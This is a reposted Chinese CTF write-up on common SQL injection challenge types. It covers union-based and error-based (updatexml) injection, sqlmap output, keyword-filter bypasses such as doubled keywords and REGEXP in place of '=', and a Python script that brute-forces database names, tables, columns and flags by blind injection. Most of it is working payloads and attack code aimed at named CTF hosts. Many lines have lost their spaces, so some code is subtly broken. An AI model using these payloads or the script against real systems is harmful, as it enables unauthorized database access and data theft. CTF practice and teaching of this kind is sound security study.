前言
正文
无过滤带回显的情况
手工注入
4. 注入出当前数据库所有的表名
id=-2' union select 1,2,3,(selectgroup_concat(table_name) from information_schema.tables wheretable_schema=database())#
5.注入出某一个表中的全部列名
id=-2' union select1,2,3,(select group_concat(column_name) from information_schema.columns wheretable_name='fl4g')#
SQLmap注入
执行结果
---
Parameter: id (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 ANDtime-based blind
Payload: id=1' AND SLEEP(5)AND 'ShhA'='ShhA
Type: UNION query
Title: Generic UNION query(NULL) - 4 columns
Payload: id=-2292' UNION ALLSELECTCONCAT(0x716b716b71,0x45784b6e4e78446d737053476e4c4875704c6a58414e444171676264674f634d436c506f554d636b,0x71766a7671),NULL,NULL,NULL--EKPR
---
3. 获取所有的数据库名
万能密码
万能密码2
过滤一部分的情况
union绕过型
2.爆表
这个到后面的操作都需要到=,但是=被过滤,所以需要等价符号来取代,具体绕过方法看我的另一篇博文。
username=admin' or updatexml/*&password=*/(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where !(table_schema <>database())),0x7e),1) or '1
在本次的环境中REGEXP也可以用来取代=。
username=admin' or updatexml/*&password=*/(1,concat(0x7e,(selectgroup_concat(table_name) from information_schema.tables where table_schemaREGEXP database()),0x7e),1) or '1
3. 爆字段
username=admin' or updatexml/*&password=*/(1,concat(0x7e,(selectgroup_concat(column_name) from information_schema.columns where table_nameREGEXP 'ffll44jj' ),0x7e),1) or '1
4.爆内容
username=admin' or updatexml/*&password=*/(1,concat(0x7e,(selectvalue from ffll44jj ),0x7e),1) or '1
小结
遇到sql注入不要慌,恩。
Sql异或注入
1. 爆表:
http://123.206.87.240:9004/1ndex.php
?id=-2' uniounionn selecselectt 1, group_concat(table_name) frominfoorrmation_schema.tables where table_schema=database() --+
2. 爆字段
http://123.206.87.240:9004/1ndex.php
?id=-2' uniounionn selecselectt 1, group_concat(column_name) frominfoorrmation_schema.columns where table_name='flag1'--+
3. 爆数据
http://123.206.87.240:9004/1ndex.php
?id=-2' uniounionn selecselectt 1,flag1 from flag1--+
1.爆表
http://123.206.87.240:9004/Once_More.php
?id=1' and updatexml(1,concat('_',(select group_concat(table_name) frominformation_schema.tables where table_schema=database()),'_'),1) --+
XPATH syntax error: ',flag2_'
2.爆字段
http://123.206.87.240:9004/Once_More.php
?id=1' and updatexml(1,concat('~',(select group_concat(column_name)from information_schema.columns where table_name='flag2'),'~'),1) --+
XPATH syntax error: '~flag2,address~'
3.爆内容
http://123.206.87.240:9004/Once_More.php
?id=1' and updatexml(1,concat('~',(select flag2 from flag2),'~'),1) --+
XPATH syntax error: '~flag{Bugku-sql_6s-2i-4t-bug}~'
Sql盲注
#!/usr/bin/env python3
# coding:utf-8
# power by jedi
import requests
headers = {
"POST":"/web/earnest/index.php HTTP/1.1",
"Host":"ctf5.shiyanbar.com",
"User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101Firefox/52.0",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding":"gzip, deflate"
}
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
str_right = "You are in"
guess ="abcdefghijklmnopqrstuvwxyz0123456789~+=-*/{}?!:@#$&[]._ "
def get_database_name_length():
print("get_database_name_length start...")
i = 0
while True:
data = {
'id':"0'oorr(length(database())=%s)oorr'0" % i,
"submit":"%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2"
}
response = requests.post(
url, data=data,headers=headers, timeout=3).text
# print(response)
if str_right in response:
print("databasename length: %s" % i)
return i
i += 1
def get_database_name():
print("get_database_namestart...")
# database_name_length =get_database_name_length()
database_name_length = 18
database_name = ""
for i in range(0,database_name_length):
i += 1
for x in guess:
data = {
'id':"0'oorr(mid((database())from(%s)foorr(1))='%s')oorr'0" % (i, x),
"submit": "%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2"
}
# print(x)
try:
response = requests.post(
url,data=data, headers=headers, timeout=3).text
# print(data)
if str_right inresponse:
database_name+= x
print("%s--------%s" % (i, x))
break
except Exception ase:
print(e)
print("databasename:%s" % database_name)
def get_table_name():
print("get_table_namestart...")
table_names = ""
for i in range(30):
i += 1
for x in guess:
data = {
"id":"0'oorr((select(mid(group_concat(table_name)from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"% (i, x)
}
try:
response = requests.post(
url,data=data, headers=headers, timeout=3).text
# print(data)
if str_right inresponse:
table_names+= x
print("%s--------%s" % (i, x))
break
except Exception ase:
print(e)
print("tablenames:%s" % table_names)
'''
1--------f
2--------i
3--------a
4--------g
6--------u
7--------s
8--------e
9--------r
10--------s
'''
def get_column_name():
print("get_column_name")
column_name = ""
for i in range(30):
i += 1
for x in guess:
data = {
"id":"0'oorr((select(mid(group_concat(column_name)from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"% (i, x)
}
try:
response =requests.post(
url,data=data, headers=headers, timeout=3).text
# print(data)
if str_right in response:
column_name+= x
print("%s--------%s" % (i, x))
break
except Exception ase:
print(e)
print("tablenames:%s" % column_name)
'''
1--------f
2--------l
3--------$
4--------4
5--------g
'''
def dump_flag():
print("dump_flag")
flag = ""
for i in range(30):
i += 1
for x in guess:
data = {
"id":"0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0"%(i,x)
}
#print(data)
try:
response =requests.post(url, data=data, headers=headers, timeout=3).text
if str_right in response:
flag += x
print("%s-----%s"%(i,x))
break
except Exception ase:
print(e)
def main():
# get_database_name_length()
#get_table_name()
#get_column_name()
dump_flag()
if __name__ == '__main__':
main()
小结:sql盲注一般先要判断盲注的类型,然后判断被过滤的关键字,再然后关键字绕过,最后编码。
转载自:https://blog.csdn.net/huanghelouzi/article/details/82999684
本文始发于微信公众号(LemonSec):CTF中SQL注入常见题型整理
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论